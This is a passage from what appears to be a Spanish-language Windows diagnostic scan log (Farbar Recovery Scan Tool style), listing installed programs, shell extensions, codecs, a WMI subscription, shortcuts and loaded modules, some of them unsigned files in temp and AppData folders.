Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6662 - Realtek Semiconductor Corp.)
Realterm 2.0.0.70_SignedWrapper (HKLM-x32\...\Realterm) (Version: 2.0.0.70_SignedWrapper - Broadcast Equipment)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.30.0 - Renesas Electronics Corporation) Hidden
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.30.0 - Renesas Electronics Corporation)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.59.0 - Samsung Electronics Co., Ltd.)
Skype™ 6.13 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.13.104 - Skype Technologies S.A.)
Software de impresora EPSON (HKLM\...\EPSON Printer and Utilities) (Version:  - SEIKO EPSON Corporation)
Software Logitech para juegos 8.45 (HKLM\...\Logitech Gaming Software) (Version: 8.45.88 - Logitech Inc.)
SpyHunter 5 (HKLM-x32\...\SpyHunter5) (Version: 5.6.1.119 - EnigmaSoft Limited)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.2.36215 - TeamViewer)
TvRadioOnline (HKLM-x32\...\{1CEC13E7-836C-4FDD-BB69-95ED1572306B}_is1) (Version: 4.8 - TV&Radio streeming inc)
Twixtor 5, After Effects-compatible plugin set (HKLM-x32\...\Twixtor 5, After Effects-compatible plugin set) (Version:  - )
UltraISO Premium V9.53 (HKLM-x32\...\UltraISO_is1) (Version:  - )
Vegas Pro 12.0 (64-bit) (HKLM\...\{7AF65840-6575-11E2-ACDF-F04DA23A5C58}) (Version: 12.0.486 - Sony)
VideoPad Video Editor (HKLM-x32\...\VideoPad) (Version: 5.01 - NCH Software)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.6 - VideoLAN)
WavePad Sound Editor (HKLM-x32\...\WavePad) (Version: 6.33 - NCH Software)
WBFS Manager 3.0 (HKLM-x32\...\WBFS Manager 3.0) (Version: 3.0 - AlexDP)
WebTablet FB Plugin (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.0.0.1 - Wacom Technology Corp.)
WebTablet IE Plugin (HKLM-x32\...\Wacom WebTabletPlugin for IE) (Version: 1.1.0.12 - Wacom Technology Corp.)
WebTablet Netscape Plugin (HKLM-x32\...\Wacom WebTabletPlugin for Netscape) (Version: 1.1.0.10 - Wacom Technology Corp.)
Winamp (HKLM-x32\...\Winamp) (Version: 5.63  - Nullsoft, Inc)
Windows Driver Package - Dirección General de la Policía (UMPass) SmartCard  (10/04/2015 1.0.2.4) (HKLM\...\8511265726450F16617C484913A433A328D3D65C) (Version: 10/04/2015 1.0.2.4 - Dirección General de la Policía)
Windows Driver Package - GoPro (WinUSB) Universal Serial Bus devices  (03/07/2012 ) (HKLM\...\0B624A43DD66DBF5CF3EDFA9741A364E688062A4) (Version: 03/07/2012  - GoPro)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3503.0728 - Microsoft Corporation)
WinRAR 4.10 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.10.0 - win.rar GmbH)
WinSCP 4.2.9 (HKLM-x32\...\winscp3_is1) (Version: 4.2.9 - Martin Prikryl)
Yandex Browser (HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\YandexBrowser) (Version: 19.7.2.455 - YANDEX)
Youtube Downloader HD v. 2.9.9.42 (HKLM-x32\...\Youtube Downloader HD_is1) (Version:  - YoutubeDownloaderHD.com)

==================== Personalizado CLSID (Lista blanca): ==============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2020-01-17] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2020-01-17] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2020-01-17] (Mega Limited -> )
ShellIconOverlayIdentifiers: [  GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync64.dll [2019-06-27] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync64.dll [2019-06-27] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync64.dll [2019-06-27] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [000BoxDesktopFileLocked] -> {C253B817-3A00-475f-A5A3-6F2DD704B48D} => C:\Program Files\Box Sync\BoxIconOverlayHandler.dll [2013-06-07] (Box, Inc.) [Archivo no firmado]
ShellIconOverlayIdentifiers: [000BoxDesktopNotSynced] -> {19ACC806-F7AA-46AA-A80A-726A07CA6637} => C:\Program Files\Box Sync\BoxIconOverlayHandler.dll [2013-06-07] (Box, Inc.) [Archivo no firmado]
ShellIconOverlayIdentifiers: [000BoxDesktopNotSyncedCollabs] -> {337D9DE0-3F8B-4430-AF0F-FFC24A95AE8F} => C:\Program Files\Box Sync\BoxIconOverlayHandler.dll [2013-06-07] (Box, Inc.) [Archivo no firmado]
ShellIconOverlayIdentifiers: [000BoxDesktopSynced] -> {B7AC9C6D-F15B-4B1A-A88D-F518D13861D9} => C:\Program Files\Box Sync\BoxIconOverlayHandler.dll [2013-06-07] (Box, Inc.) [Archivo no firmado]
ShellIconOverlayIdentifiers: [000BoxDesktopSyncedCollab] -> {9E48C232-F601-4E41-BB3E-16CBAF317AA4} => C:\Program Files\Box Sync\BoxIconOverlayHandler.dll [2013-06-07] (Box, Inc.) [Archivo no firmado]
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2020-01-17] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2020-01-17] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2020-01-17] (Mega Limited -> )
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => E:\Archivos de Programa\Notepad++\NppShell_06.dll [2019-01-27] (Notepad++ -> )
ContextMenuHandlers1: [BoxDesktop] -> {2BF1BC5C-AADF-4AB4-BA2E-1BC880371AE8} => C:\Program Files\Box Sync\BoxContextMenuHandler.dll [2013-06-07] (Box, Inc.) [Archivo no firmado]
ContextMenuHandlers1-x32: [Cover Designer] -> {73FCA462-9BD5-4065-A73F-A8E5F6904EF7} => E:\Archivos de Programa\Nero 7\Nero CoverDesigner\CoverEdExtension.dll [2007-06-28] (Nero AG -> Nero AG)
ContextMenuHandlers1: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2019-06-27] (Google LLC -> Google)
ContextMenuHandlers1: [Kaspersky Anti-Virus] -> {dd230880-495a-11d1-b064-008048ec2fc5} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\shellex.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2020-01-17] (Mega Limited -> )
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => E:\Archivos de Programa\Tools\Mp3tag\Mp3tagShell64.dll [2012-12-22] (Florian Heidenreich) [Archivo no firmado]
ContextMenuHandlers1: [NP8ShellExtension] -> {9C4B85B8-956C-49BF-9BA5-101384E562B2} => E:\Pro11\NPSHEL~1.DLL [2016-12-08] (Nitro Software, Inc. -> Nitro PDF)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-01-09] () [Archivo no firmado]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2012-01-09] () [Archivo no firmado]
ContextMenuHandlers2: [Kaspersky Anti-Virus] -> {dd230880-495a-11d1-b064-008048ec2fc5} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\shellex.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2020-01-17] (Mega Limited -> )
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => E:\Archivos de Programa\Tools\Mp3tag\Mp3tagShell64.dll [2012-12-22] (Florian Heidenreich) [Archivo no firmado]
ContextMenuHandlers2: [UltraISO] -> {AD392E40-428C-459F-961E-9B147782D099} => E:\Archivos de Programa\UltraISO\isoshl64.dll [2009-10-22] (SHENZHEN YIBO DIGITAL SYSTEMS DEVELOPMENT CO. LTD. -> EZB Systems, Inc.)
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2020-01-17] (Mega Limited -> )
ContextMenuHandlers4: [BoxDesktop] -> {2BF1BC5C-AADF-4AB4-BA2E-1BC880371AE8} => C:\Program Files\Box Sync\BoxContextMenuHandler.dll [2013-06-07] (Box, Inc.) [Archivo no firmado]
ContextMenuHandlers4: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2019-06-27] (Google LLC -> Google)
ContextMenuHandlers4: [Kaspersky Anti-Virus] -> {dd230880-495a-11d1-b064-008048ec2fc5} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\shellex.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2020-01-17] (Mega Limited -> )
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => E:\Archivos de Programa\Tools\Mp3tag\Mp3tagShell64.dll [2012-12-22] (Florian Heidenreich) [Archivo no firmado]
ContextMenuHandlers4: [RecuvaShellExt] -> {435E5DF5-2510-463C-B223-BDA47006D002} => C:\Program Files\Recuva\RecuvaShell64.dll [2015-04-08] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers4: [UltraISO] -> {AD392E40-428C-459F-961E-9B147782D099} => E:\Archivos de Programa\UltraISO\isoshl64.dll [2009-10-22] (SHENZHEN YIBO DIGITAL SYSTEMS DEVELOPMENT CO. LTD. -> EZB Systems, Inc.)
ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-01-09] () [Archivo no firmado]
ContextMenuHandlers4-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2012-01-09] () [Archivo no firmado]
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\atiacm64.dll [2013-08-30] (Advanced Micro Devices, Inc.) [Archivo no firmado]
ContextMenuHandlers6: [Kaspersky Anti-Virus] -> {dd230880-495a-11d1-b064-008048ec2fc5} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\shellex.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
ContextMenuHandlers6: [RecuvaShellExt] -> {435E5DF5-2510-463C-B223-BDA47006D002} => C:\Program Files\Recuva\RecuvaShell64.dll [2015-04-08] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers6: [UltraISO] -> {AD392E40-428C-459F-961E-9B147782D099} => E:\Archivos de Programa\UltraISO\isoshl64.dll [2009-10-22] (SHENZHEN YIBO DIGITAL SYSTEMS DEVELOPMENT CO. LTD. -> EZB Systems, Inc.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-01-09] () [Archivo no firmado]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2012-01-09] () [Archivo no firmado]

==================== Codecs (Lista blanca) ====================

(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)

HKLM\...\Drivers32: [VIDC.CFHD] => C:\Windows\system32\CFHD.dll [1443328 2013-09-05] (CineForm Inc.) [Archivo no firmado]
HKLM\...\Drivers32: [VIDC.FMVC] => C:\Windows\SysWOW64\fmcodec.dll [77824 2008-08-18] (Fox Magic Software) [Archivo no firmado]
HKLM\...\Drivers32: [VIDC.CFHD] => C:\Windows\SysWOW64\CFHD.DLL [1474560 2013-09-05] (CineForm Inc.) [Archivo no firmado]
HKLM\...\Drivers32: [vidc.VP60] => C:\Windows\SysWOW64\vp6vfw.dll [447752 2008-09-05] (Electronic Arts -> On2.com)
HKLM\...\Drivers32: [vidc.VP61] => C:\Windows\SysWOW64\vp6vfw.dll [447752 2008-09-05] (Electronic Arts -> On2.com)
17 
==================== Accesos directos & WMI ========================

(Las entradas pueden ser listadas para ser restauradas o eliminadas.)

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
Shortcut: C:\Users\MrEidrian\Favorites\NCH Software Download Site.lnk -> hxxp://www.nchsoftware.com/index.htm
Shortcut: C:\Users\MrEidrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Tools\Video\Anim-FX\website.lnk -> hxxp://www.anim-fx.com
ShortcutWithArgument: C:\Users\MrEidrian\Desktop\Persona 1 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Default"
ShortcutWithArgument: C:\Users\MrEidrian\Desktop\SEO - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Profile 1"

==================== Módulos cargados (Lista blanca) =============

2012-09-08 12:16 - 2012-09-08 12:16 - 000315392 _____ () [Archivo no firmado] C:\Program Files (x86)\Evernote\Evernote\libtidy.dll
2012-09-08 12:16 - 2012-09-08 12:16 - 000433664 _____ () [Archivo no firmado] C:\Program Files (x86)\Evernote\Evernote\libxml2.dll
2020-01-17 11:34 - 2020-01-17 11:34 - 000139264 _____ () [Archivo no firmado] C:\Program Files (x86)\Google\Chrome\Application\WINHTTP.dll
2012-06-23 11:32 - 2012-01-09 18:44 - 000193536 _____ () [Archivo no firmado] C:\Program Files\WinRAR\rarext.dll
2020-01-17 11:41 - 2020-01-17 11:41 - 000105984 _____ () [Archivo no firmado] C:\ProgramData\NtvHost\L.dll
2020-01-17 11:53 - 2020-01-17 11:53 - 000139264 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication\WINHTTP.dll
2020-01-31 11:10 - 2020-01-31 11:10 - 000723968 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-007J5.tmp\oswlgg15f1h.tmp
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-1801B.tmp\251zwfb1una.tmp
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-27APO.tmp\emdwzefyk2y.tmp
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-3RUQC.tmp\0pbpdqr0a5k.tmp
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-3TFQG.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-6BAIV.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-9SBJV.tmp\itdownload.dll
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-AGTBR.tmp\xpvfw24cqky.tmp
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-AJVC4.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-BLKKH.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-BLKKI.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-CD8CM.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-CJT48.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-FAB73.tmp\itdownload.dll
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-GHA5E.tmp\0xyemshxszc.tmp
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-HQODJ.tmp\sbatxjutel4.tmp
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-HRQMA.tmp\itdownload.dll
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I1NTH.tmp\sqhrsfjrtyk.tmp
2020-01-31 11:10 - 2020-01-31 11:10 - 000723968 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I2K7L.tmp\30rwyhw2iwt.tmp
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I4PTQ.tmp\vkfgpve1kmf.tmp
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-LVUEI.tmp\pvtkqi5q5e2.tmp
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-NSE98.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-O6NNI.tmp\itdownload.dll
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-QLBVR.tmp\vvegzej4wy2.tmp
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-RGEG7.tmp\itdownload.dll
2020-01-31 11:10 - 2008-10-15 16:44 - 000205312 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-RLT00.tmp\itdownload.dll
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-SDRGI.tmp\jujerzwizaa.tmp
2020-01-31 11:10 - 2020-01-31 11:10 - 000716800 _____ () [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-T0S8A.tmp\i4loeahzfup.tmp
2012-11-10 20:57 - 2012-11-10 20:57 - 000093696 _____ () [Archivo no firmado] E:\Archivos de Programa\FileZilla FTP Client\fzshellext.dll
2010-01-02 15:42 - 2010-01-02 15:42 - 000098304 _____ () [Archivo no firmado] E:\Archivos de Programa\FileZilla FTP Client\fzshellext_64.dll
2011-09-20 00:03 - 2011-09-19 23:03 - 000015472 _____ (ACD Systems International Inc -> ACD Systems) [Archivo no firmado] E:\Archivos de Programa\ACDSeePro5\ACDSee Pro\5.0\1033\ACDSeeProInTouch2.exe.dll
2019-06-16 08:32 - 2019-06-16 08:32 - 000031744 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\A4.Foundation\22ac18f1f25b56828adcbf0552b3d4b6\A4.Foundation.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000022528 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\AEM.Actions5dc83b46#\18ded31d3268cdf3f771b0076242dbef\AEM.Actions.CCAA.Shared.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000013312 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\AEM.Plugin.0a1309f7#\19379f468356198817f5665ee565e3bc\AEM.Plugin.EEU.Shared.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000017408 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\AEM.Plugin.2b6a6775#\f46a24de543f312d24e9d8c70615a8a6\AEM.Plugin.Hotkeys.Shared.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000012800 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\AEM.Plugin.4adf1574#\c4d80a035fc03bc14364704075593d62\AEM.Plugin.Audio.Shared.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000275968 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\AEM.Plugin.5d945b6b#\9f42853a84cbfb2c3350313a509bdda2\AEM.Plugin.Source.Kit.Server.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000015360 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\AEM.Plugin.674d2b8a#\622309114ee93dc247d4056c679ce156\AEM.Plugin.WinMessages.Shared.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000013312 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\AEM.Plugin.88aba5d2#\51620cfac972219233719b669da2899a\AEM.Plugin.REG.Shared.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000012800 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\AEM.Plugin.GD.Shared\c0ad87f3e00d9b9734bdf79f2ea06d91\AEM.Plugin.GD.Shared.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000013824 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\AEM.Server.Shared\573269c4998e0b6d5db7e274ef3ffece\AEM.Server.Shared.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000263168 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\AEM.Server\4461cfa93f0275e3d4f85e05586a7537\AEM.Server.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000056320 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\APM.Foundation\6f15a16e3bca71447019854c6fdd3595\APM.Foundation.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000122368 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\ATICCCom\41cb88fa520b634584077925e33479a0\ATICCCom.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000199168 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CCC.Implementation\eb834c717cb734f41260127a8a909556\CCC.Implementation.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000124928 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.3399d0ec#\79d0ae2d0127a934f177a6185c29c216\CLI.Aspect.CustomFormats.Graphics.Shared.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000026112 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.37d3d968#\8c8dee21b735a21f41f7381dadb00f5e\CLI.Aspect.AMDHome.Graphics.Shared.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000045056 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.382a3def#\12abebd5826329130960f40f809e8488\CLI.Aspect.AMDOverDrive.Platform.Shared.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000104448 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.3a6f1658#\398e10317dd29a004795bd32d55c5ac9\CLI.Aspect.TransCode.Graphics.Shared.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000206336 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.4542c692#\8f990e99f955c0e5f050feb7ce5d63e1\CLI.Aspect.DeviceCRT.Graphics.Shared.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000073728 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.4bbb0755#\93d61afb5a000941665800e7bc1164dd\CLI.Aspect.TransCode.Graphics.Dashboard.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000285696 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.7ec2db45#\64d9fd5b6e91c6b10e7bef56e1cd4253\CLI.Aspect.DeviceDFP.Graphics.Shared.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000604672 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.846fa813#\3943215ed9cd9c5e7527438e63e44e5c\CLI.Aspect.MMVideo.Graphics.Dashboard.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000269824 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.87ad5c75#\4cb103a3a2866fd33a1e50fc2d09c351\CLI.Aspect.OverDrive5.Graphics.Dashboard.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000723968 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.8d333b6b#\98284155134734cd947b3120ed02dcbd\CLI.Aspect.Radeon3D.Graphics.Shared.ni.dll
